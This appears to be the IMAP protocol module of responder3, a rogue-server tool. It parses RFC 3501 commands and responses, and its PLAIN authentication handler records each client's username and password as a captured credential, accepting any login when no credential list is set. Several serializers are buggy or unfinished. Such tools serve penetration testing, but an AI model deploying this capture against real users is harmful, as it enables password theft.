
#https://tools.ietf.org/html/rfc3501
import io
import enum
import asyncio
import traceback
import base64

from responder3.core.commons import read_element
from responder3.core.logging.log_objects import Credential
from responder3.core.asyncio_helpers import *

class IMAPAuthStatus(enum.Enum):
	OK = enum.auto()
	NO = enum.auto()
	MORE_DATA_NEEDED = enum.auto()

class IMAPVersion(enum.Enum):
	IMAP    = 'IMAP'
	IMAPv4    = 'IMAPv4'
	IMAP4rev1 = 'IMAP4rev1'

class IMAPAuthMethod(enum.Enum):
	PLAIN = enum.auto()

class IMAPState(enum.Enum):
	NOTAUTHENTICATED = enum.auto()
	MULTIAUTH        = enum.auto()
	AUTHENTICATED    = enum.auto()
	SELECTED         = enum.auto()
	LOGOUT           = enum.auto()

class IMAPResponse(enum.Enum):
	OK         = enum.auto()
	NO         = enum.auto()
	BAD        = enum.auto()
	PREAUTH    = enum.auto()
	BYE        = enum.auto()
	CAPABILITY = enum.auto()
	LIST       = enum.auto()
	LSUB       = enum.auto()
	STATUS     = enum.auto()
	SEARCH     = enum.auto()
	FLAGS      = enum.auto()
	EXISTS     = enum.auto()
	RECENT     = enum.auto()
	EXPUNGE    = enum.auto()
	FETCH      = enum.auto()

class IMAPCommand(enum.Enum):
	CAPABILITY   = enum.auto()
	NOOP         = enum.auto()
	LOGOUT       = enum.auto()
	STARTTLS     = enum.auto()
	AUTHENTICATE = enum.auto()
	LOGIN        = enum.auto()
	SELECT       = enum.auto()
	EXAMINE      = enum.auto()
	CREATE       = enum.auto()
	DELETE       = enum.auto()
	RENAME       = enum.auto()
	SUBSCRIBE    = enum.auto()
	UNSUBSCRIBE  = enum.auto()
	LIST         = enum.auto()
	LSUB         = enum.auto()
	STATUS       = enum.auto()
	APPEND       = enum.auto()
	Client       = enum.auto()
	CHECK        = enum.auto()
	CLOSE        = enum.auto()
	EXPUNGE      = enum.auto()
	SEARCH       = enum.auto()
	FETCH        = enum.auto()
	STORE        = enum.auto()
	COPY         = enum.auto()
	UID          = enum.auto()
	XXXX         = enum.auto()


class IMAPCommandParser:
	def __init__(self, strict = False, encoding = 'utf-7'):
		self.imapcommand = None
		self.strict      = strict
		self.encoding    = encoding
		self.timeout     = 10

	async def from_streamreader(self, reader):
		cmd = await readline_or_exc(reader, timeout = self.timeout)
		return self.from_bytes(cmd)

	def from_bytes(self, bbuff):
		return self.from_buffer(io.BytesIO(bbuff))

	def from_buffer(self, buff):
		line = buff.readline()
		try:
			tag, command, *params = line.strip().decode(self.encoding).split(' ')
			command = command.upper()
			if command in IMAPCommand.__members__:
				cmd = IMAPCMD[IMAPCommand[command]].from_bytes(line)
			else:
				cmd = IMAPXXX.from_bytes(line)
			return cmd

		except Exception as e:
			traceback.print_exc()
			return IMAPXXX.from_bytes(line)


class IMAPResponseParser:
	def __init__(self, strict = False, encoding = 'utf-7'):
		self.imapcommand = None
		self.strict      = strict
		self.encoding    = encoding
		self.timeout     = 10

	async def from_streamreader(self, reader):
		resp = await readline_or_exc(reader, timeout = self.timeout)
		return self.from_bytes(resp)

	def from_bytes(self, bbuff):
		return self.from_buffer(io.BytesIO(bbuff))

	def from_buffer(self, buff):
		line = buff.readline()
		try:
			tag, *params = line.strip().decode(self.encoding).split(' ')
			if tag == '*':
				command = params[0]
				if command in IMAPResponse.__members__:
					resp = IMAPRESP[IMAPResponse[command]].from_bytes(line)
				else:
					resp = IMAPXXX.from_bytes(line)
			else:
				if params[0] == 'OK':
					resp = IMAPOKResp.from_bytes(line)
				elif params[0] == 'BAD':
					resp = IMAPBADResp.from_bytes(line)
				elif params[0] == 'NO':
					resp = IMAPNOResp.from_bytes(line)
				else:
					resp = IMAPXXX.from_bytes(line)

			return resp

		except Exception as e:
			print(str(e))
			return IMAPXXX.from_bytes(line)


def read_list(line):
	temp = read_element(line, marker = '(', marker_end = ')')
	return temp[1:-1].split(' ')


class IMAPXXX:
	def __init__(self):
		self.data = None

	@staticmethod
	def from_bytes(bbuff):
		cmd = IMAPXXX()
		cmd.data = bbuff
		return cmd

	def __str__(self):
		return '%s' % self.data


class IMAPCAPABILITYCmd:
	# Arguments:  none
	# Responses:  REQUIRED untagged response: CAPABILITY
	# Result: [OK, BAD]
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.CAPABILITY

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPCAPABILITYCmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPCAPABILITYCmd()
		cmd.tag, bbuff = read_element(bbuff, toend = True)
		cmd.command = IMAPCommand[bbuff.upper()]
		return cmd

	@staticmethod
	def construct(tag):
		cmd = IMAPCAPABILITYCmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % (self.tag, self.command.value)).encode(encoding)

	def __str__(self):
		return '%s %s\r\n' % (self.tag, self.command.name)


class IMAPCAPABILITYResp:
	# must be untagged!
	def __init__(self):
		self.tag     = '*'
		self.command = IMAPCommand.CAPABILITY
		self.capabilities = []

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPCAPABILITYResp.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		resp = IMAPCAPABILITYResp()
		resp.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		resp.command = IMAPCommand[t.upper()]
		resp.capabilities = bbuff.split(' ')

		return resp

	@staticmethod
	def construct(supported_versions, supported_auth_types, additional_capabilities, tag = '*'):
		resp = IMAPCAPABILITYResp()
		resp.tag = tag
		for cap in supported_versions:
			resp.capabilities.append(cap.name)
		for cap in additional_capabilities:
			resp.capabilities.append(cap)
		for auth in supported_auth_types:
			resp.capabilities.append('AUTH=%s' % auth.name)

		return resp

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.name, ' '.join(self.capabilities))).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, ' '.join(self.capabilities))


class IMAPNOOPCmd():
	# Arguments:  none
	# Responses:  no specific responses for this command (but see below)
	# Result:     OK,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.NOOP

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPNOOPCmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPNOOPCmd()
		cmd.tag, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[bbuff.upper()]
		return cmd

	@staticmethod
	def construct(tag):
		cmd = IMAPNOOPCmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % self.tag, self.command.value).encode(encoding)

	def __str__(self):
		return '%s %s\r\n' % (self.tag, self.command.name)


class IMAPLOGOUTCmd:
	# Arguments:  none
	# Responses:  REQUIRED untagged response: BYE
	# Result:     OK,BAD - command unknown or arguments invalid
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.NOOP

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPLOGOUTCmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPLOGOUTCmd()
		cmd.tag, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[bbuff.upper()]
		return cmd

	@staticmethod
	def construct(tag):
		cmd = IMAPLOGOUTCmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % (self.tag, self.command.value)).encode(encoding)

	def __str__(self):
		return '%s %s\r\n' % (self.tag, self.command.name)


class IMAPSTARTTLSCmd:
	# Arguments:  none
	# Responses:  no specific response for this command
	# Result:     OK, BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.STARTTLS

	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPSTARTTLSCmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPSTARTTLSCmd()
		cmd.tag, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[bbuff.upper()]
		return cmd

	@staticmethod
	def construct(tag):
		cmd = IMAPSTARTTLSCmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % self.tag, self.command.value).encode(encoding)

	def __str__(self):
		return '%s %s\r\n' % (self.tag, self.command.name)


class IMAPAUTHENTICATECmd:
	# Arguments:  authentication mechanism name
	# Responses:  continuation data can be requested
	# Result:     OK,NO,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.AUTHENTICATE
		self.auth_type = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPAUTHENTICATECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		print('Here!')
		try:
			bbuff = bbuff.decode(encoding).strip()
			cmd = IMAPAUTHENTICATECmd()
			cmd.tag, bbuff = read_element(bbuff)
			t, bbuff = read_element(bbuff)
			cmd.command = IMAPCommand[t.upper()]
			cmd.auth_type = IMAPAuthMethod[bbuff.upper()]
			return cmd
		except Exception as e:
			print(str(e))
			raise e

	@staticmethod
	def construct(tag, auth_type):
		cmd = IMAPAUTHENTICATECmd()
		cmd.tag = tag
		cmd.auth_type = auth_type
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s \r\n' % self.tag, self.command.value, self.auth_type).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.auth_type)


class IMAPLOGINCmd:
	# Arguments:  user name,password
	# Responses:  no specific responses for this command
	# Result:     OK,NO,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.LOGIN
		self.username = None
		self.password = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPLOGINCmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPLOGINCmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.username, bbuff = read_element(bbuff)
		cmd.password = bbuff
		return cmd

	@staticmethod
	def construct(tag, username, password):
		cmd = IMAPLOGINCmd()
		cmd.tag = tag
		cmd.username = username
		cmd.password = password
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s %s\r\n' % (self.tag, self.command.value, self.username, self.password)).encode(encoding)

	def __str__(self):
		return '%s %s %s %s\r\n' % (self.tag, self.command.name, self.username, self.password)


class IMAPSELECTCmd:
	# Arguments:  mailbox name
	# Responses:  REQUIRED untagged responses: FLAGS, EXISTS, RECENT
    #            REQUIRED OK untagged responses:  UNSEEN,  PERMANENTFLAGS,
    #            UIDNEXT, UIDVALIDITY
	# Result:     OK,NO,BAD - command unknown or arguments invalid
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.SELECT
		self.mailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPSELECTCmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		try:
			bbuff = bbuff.decode(encoding).strip()
			cmd = IMAPSELECTCmd()
			cmd.tag, bbuff = read_element(bbuff)
			t, bbuff = read_element(bbuff)
			cmd.command = IMAPCommand[t.upper()]
			cmd.mailboxname = bbuff
			return cmd
		except Exception as e:
			print(str(e))
			raise e

	@staticmethod
	def construct(tag, mailboxname):
		cmd = IMAPSELECTCmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname)


class IMAPEXAMINECmd:
	# Arguments:  mailbox name
	# Responses:  REQUIRED untagged responses: FLAGS, EXISTS, RECENT
	#            REQUIRED OK untagged responses:  UNSEEN,  PERMANENTFLAGS,
	#            UIDNEXT, UIDVALIDITY
	# Result:     OK,NO,BAD - command unknown or arguments invalid
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.EXAMINE
		self.mailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPEXAMINECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPEXAMINECmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.mailboxname = bbuff
		return cmd

	@staticmethod
	def construct(tag, mailboxname):
		cmd = IMAPEXAMINECmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname)


class IMAPCREATECmd:
	# Arguments:  mailbox name
	# Responses:  no specific responses for this command
	# Result:     OK,NO,BAD - command unknown or arguments invalid
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.CREATE
		self.mailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPCREATECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPCREATECmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.mailboxname = bbuff
		return cmd

	@staticmethod
	def construct(tag, mailboxname):
		cmd = IMAPCREATECmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname)


class IMAPDELETECmd:
	# Arguments:  mailbox name
	# Responses:  no specific responses for this command
	# Result:     OK,NO,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.DELETE
		self.mailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPDELETECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPDELETECmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.mailboxname = bbuff
		return cmd

	@staticmethod
	def construct(tag, mailboxname):
		cmd = IMAPDELETECmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname)


class IMAPRENAMECmd:
	# Arguments:  existing mailbox name
	#           new mailbox name
	# Responses:  no specific responses for this command
	# Result:     OK,NO,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.RENAME
		self.mailboxname = None
		self.newmailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPRENAMECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPRENAMECmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.mailboxname = bbuff
		return cmd

	@staticmethod
	def construct(tag, mailboxname,newmailboxname):
		cmd = IMAPRENAMECmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		cmd.newmailboxname = newmailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname, self.newmailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname, self.newmailboxname)


class IMAPSUBSCRIBECmd:
	# Arguments:  mailbox
	# Responses:  no specific responses for this command
	# Result:     OK,NO,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.SUBSCRIBE
		self.mailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPSUBSCRIBECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPSUBSCRIBECmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.mailboxname = bbuff
		return cmd

	@staticmethod
	def construct(tag, mailboxname):
		cmd = IMAPSUBSCRIBECmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname)


class IMAPUNSUBSCRIBECmd:
	# Arguments:  mailbox
	# Responses:  no specific responses for this command
	# Result:     OK,NO,BAD
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.UNSUBSCRIBE
		self.mailboxname = None

	@staticmethod
	def from_buffer(buff, encoding = 'utf-7'):
		return IMAPUNSUBSCRIBECmd.from_bytes(buff.readline(),encoding)

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		cmd = IMAPUNSUBSCRIBECmd()
		cmd.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff)
		cmd.command = IMAPCommand[t.upper()]
		cmd.mailboxname = bbuff
		return cmd

	@staticmethod
	def construct(tag, mailboxname):
		cmd = IMAPUNSUBSCRIBECmd()
		cmd.tag = tag
		cmd.mailboxname = mailboxname
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s\r\n' % (self.tag, self.command.value, self.mailboxname)).encode(encoding)

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.command.name, self.mailboxname)


class IMAPLISTCmd:
	# tag mandatory
	# reference name mandatory
	# mailboxName mandatory
	def __init__(self):
		self.tag     = None
		self.command      = IMAPCommand.LIST
		self.refname      = None
		self.mailboxname  = None

	@staticmethod
	def construct(refname,mailboxname, tag = '*'):
		cmd = IMAPLISTCmd()
		cmd.refname = refname
		cmd.mailboxname = mailboxname
		cmd.tag = tag
		return cmd

	@staticmethod
	def from_params(tag = '*', params = None):
		cmd = IMAPLISTCmd()
		cmd.tag = tag
		cmd.refname = params[0]
		cmd.mailboxname = params[1]
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s %s\r\n' % (self.tag, self.command.value, self.refname, self.mailboxname)).encode(encoding)


class IMAPLSUBCmd:
	# tag mandatory
	# reference name mandatory
	# mailboxName mandatory
	def __init__(self):
		self.tag     = None
		self.command      = IMAPCommand.LSUB
		self.refname      = None
		self.mailboxname  = None

	@staticmethod
	def construct(refname,mailboxname, tag = '*'):
		cmd = IMAPLSUBCmd()
		cmd.refname = refname
		cmd.mailboxname = mailboxname
		cmd.tag = tag
		return cmd

	@staticmethod
	def from_params(tag = '*', params = None):
		cmd = IMAPLSUBCmd()
		cmd.tag = tag
		cmd.refname = params[0]
		cmd.mailboxname = params[1]
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s %s\r\n' % (self.tag, self.command.value, self.refname, self.mailboxname)).encode(encoding)

"""TODO
class IMAPSTATUSCmd():
	#tag mandatory
	#mailboxName mandatory
	#status data item names
	def __init__(self):
		self.tag     = None
		self.command      = IMAPCommand.LSUB
		self.refname      = None
		self.mailboxname  = None

	def construct(refname,mailboxname, tag = '*'):
		cmd = IMAPLSUBCmd()
		cmd.refname = refname
		cmd.mailboxname = mailboxname
		cmd.tag = tag
		return cmd

	def from_params(tag = '*', params = None):
		cmd = IMAPLSUBCmd()
		cmd.tag = tag
		cmd.refname = params[0]
		cmd.mailboxname = params[1]
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s %s\r\n' % self.tag, self.command.value, self.refname, self.mailboxname).encode(encoding)


class IMAPAPPENDCommand(IMAPCommandBASE):
	#tag mandatory
	#mailboxName mandatory
	#OPTIONAL flag parenthesized list
	#OPTIONAL date/time string
	#message literal
	def __init__(self, tag, mailboxName, statusData):
		self.tag     = tag
		self.command = IMAPCommand.APPEND
		self.params  = [mailboxName, statusData]
"""


class IMAPCHECKCmd:
	# no args
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.CHECK

	@staticmethod
	def construct(tag = '*'):
		cmd = IMAPCHECKCmd()
		cmd.tag = tag
		return cmd

	@staticmethod
	def from_params(tag = '*', params = None):
		cmd = IMAPCHECKCmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % (self.tag, self.command.value)).encode(encoding)


class IMAPCLOSECmd:
	# no args
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.CLOSE

	@staticmethod
	def construct(tag = '*'):
		cmd = IMAPCLOSECmd()
		cmd.tag = tag
		return cmd

	@staticmethod
	def from_params(tag = '*', params = None):
		cmd = IMAPCLOSECmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % (self.tag, self.command.value)).encode(encoding)


class IMAPEXPUNGECmd:
	# no args
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.EXPUNGE

	@staticmethod
	def construct(tag = '*'):
		cmd = IMAPEXPUNGECmd()
		cmd.tag = tag
		return cmd

	@staticmethod
	def from_params(tag = '*', params = None):
		cmd = IMAPEXPUNGECmd()
		cmd.tag = tag
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s\r\n' % (self.tag, self.command.value)).encode(encoding)

"""TODO
class IMAPSEARCHCommand():
	#tag mandatory
	def __init__(self, tag):
		self.tag     = tag
		self.command = IMAPCommand.SEARCH
		self.params  = None	

class IMAPFETCHCommand():
	#tag mandatory
	def __init__(self, tag):
		self.tag     = tag
		self.command = IMAPCommand.FETCH
		self.params  = None

class IMAPSTORECommand():
	#tag mandatory
	def __init__(self, tag):
		self.tag     = tag
		self.command = IMAPCommand.STORE
		self.params  = None
"""


class IMAPCOPYCmd:
	# tag mandatory
	def __init__(self):
		self.tag     = None
		self.command = IMAPCommand.COPY
		self.sequence    = None
		self.mailboxname = None

	@staticmethod
	def construct(sequence, mailboxname,tag = '*'):
		cmd = IMAPCOPYCmd()
		cmd.tag = tag
		cmd.sequence = sequence
		cmd.mailboxname = mailboxname
		return cmd

	@staticmethod
	def from_params(tag = '*', params = None):
		cmd = IMAPCOPYCmd()
		cmd.tag = tag
		cmd.sequence = params[0]
		cmd.mailboxname = params[1]
		return cmd

	def to_bytes(self, encoding = 'utf-7'):
		return ('%s %s %s %s\r\n' % (self.tag, self.command.value, self.sequence, self.mailboxname)).encode(encoding)

"""TODO
class IMAPUIDCommand():
	#tag mandatory
	def __init__(self, tag):
		self.tag     = tag
		self.command = IMAPCommand.COPY
		self.params  = None
"""


class IMAPOKResp:
	# tag optional
	# args optional
	def __init__(self):
		self.tag = '*'
		self.status = IMAPResponse.OK
		self.args = []

	@staticmethod
	def construct(args, tag = '*'):
		resp = IMAPOKResp()
		resp.tag = tag
		if isinstance(args, list):
			resp.args = args
		else:
			resp.args = [args]
		return resp

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		resp = IMAPOKResp()
		resp.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff, toend = True)
		resp.status = IMAPResponse[t]
		if bbuff != '':
			resp.args = bbuff.split(' ')

		return resp

	def to_bytes(self):
		return ('%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')).encode('utf-7')

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')


class IMAPBYEResp:
	# tag optional
	# args optional
	def __init__(self):
		self.tag = '*'
		self.status = IMAPResponse.BYE
		self.args = []

	@staticmethod
	def construct(args, tag = '*'):
		resp = IMAPBYEResp()
		resp.tag = tag
		if isinstance(args, list):
			resp.args = args
		else:
			resp.args = [args]
		return resp

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		resp = IMAPBYEResp()
		resp.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff, toend = True)
		resp.status = IMAPResponse[t]
		if bbuff != '':
			resp.args = bbuff.split(' ')

		return resp

	def to_bytes(self):
		return ('%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')).encode('utf-7')

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')


class IMAPBADResp:
	# tag optional
	# args optional
	def __init__(self):
		self.tag = '*'
		self.status = IMAPResponse.BAD
		self.args = []

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		resp = IMAPBADResp()
		resp.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff, toend = True)
		resp.status = IMAPResponse[t]
		if bbuff != '':
			resp.args = bbuff.split(' ')

		return resp

	@staticmethod
	def construct(args, tag = '*'):
		resp = IMAPBADResp()
		resp.tag = tag
		if isinstance(args, list):
			resp.args = args
		else:
			resp.args = [args]
		return resp

	def to_bytes(self):
		return ('%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')).encode('utf-7')

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')


class IMAPNOResp:
	# tag optional
	# args optional
	def __init__(self):
		self.tag = '*'
		self.status = IMAPResponse.NO
		self.args = []

	@staticmethod
	def construct(args, tag = '*'):
		resp = IMAPNOResp()
		resp.tag = tag
		if isinstance(args, list):
			resp.args = args
		else:
			resp.args = [args]
		return resp

	@staticmethod
	def from_bytes(bbuff, encoding = 'utf-7'):
		bbuff = bbuff.decode(encoding).strip()
		resp = IMAPNOResp()
		resp.tag, bbuff = read_element(bbuff)
		t, bbuff = read_element(bbuff, toend = True)
		resp.status = IMAPResponse[t]
		if bbuff != '':
			resp.args = bbuff.split(' ')

		return resp

	def to_bytes(self):
		return ('%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')).encode('utf-7')

	def __str__(self):
		return '%s %s %s\r\n' % (self.tag, self.status.name, ' '.join(self.args) if len(self.args) > 0 else '')


class IMAPAuthHandler:
	def __init__(self, authtype = IMAPAuthMethod.PLAIN, creds = None):
		if authtype == IMAPAuthMethod.PLAIN:
			self.authenticator = IMAPPlainAuth(creds)
		else:
			raise NotImplementedError

	def do_AUTH(self, cmd):
		return self.authenticator.verify_creds(cmd)


class IMAPPlainAuth:
	def __init__(self, creds):
		self.creds = creds

	def verify_creds(self, cmd):
		if isinstance(cmd,IMAPXXX):
			cred_data = base64.b64decode(cmd.data).decode()
			username, password = cred_data[1:].split('\x00')
			c = IMAPPlainCred(username, password)
			return IMAPAuthStatus.NO, c.to_credential()

		if cmd.command == IMAPCommand.AUTHENTICATE:
			return IMAPAuthStatus.MORE_DATA_NEEDED, b'+\r\n'

		c = IMAPPlainCred(cmd.username, cmd.password)
		if self.creds is None:
			return IMAPAuthStatus.OK, c.to_credential()
		else:
			if c.username in self.creds:
				if self.creds[c.username] == c.password:
					return IMAPAuthStatus.OK, c.to_credential()

			else:
				return IMAPAuthStatus.NO, c.to_credential()

		return IMAPAuthStatus.NO, c.to_credential()


class IMAPPlainCred:
	def __init__(self, username, password):
		self.username = username
		self.password = password

	def to_credential(self):
		return Credential('PLAIN', 
			username = self.username,
			password = self.password,
			fullhash = '%s:%s' % (self.username, self.password)
		)

"""
class IMAPResponse():
	def __init__(self, tag, encoding = 'utf-7'):
		self.encoding = encoding
		self.tag    = tag
		self.status = None
		self.params = None

	def to_bytes(self):
		if self.tag is None: 
			self.tag = '*'

		if self.params is None:
			return b' '.join([self.tag.encode(self.encoding), self.status.name.encode(self.encoding)]) + b'\r\n'
		else:
			return b' '.join([self.tag.encode(self.encoding), self.status.name.encode(self.encoding),  b' '.join([param.encode(self.encoding) for param in self.params])]) + b'\r\n'

	def __repr__(self):
		t  = '== IMAP Response ==\r\n' 
		t += 'STATUS: %s\r\n' % self.status.name
		t += 'ARGS  : %s\r\n' % self.args
		return t




class IMAPPREAUTHResp(IMAPResponse):
	#always untagged
	#args optional
	def __init__(self, msg = None):
		IMAPResponse.__init__(self, tag)
		self.status = IMAPResponseCode.PREAUTH
		self.params = [msg] if msg is not None else msg

class IMAPBYEResp(IMAPResponse):
	#always untagged
	#args optional
	def __init__(self, msg = None):
		IMAPResponse.__init__(self, tag)
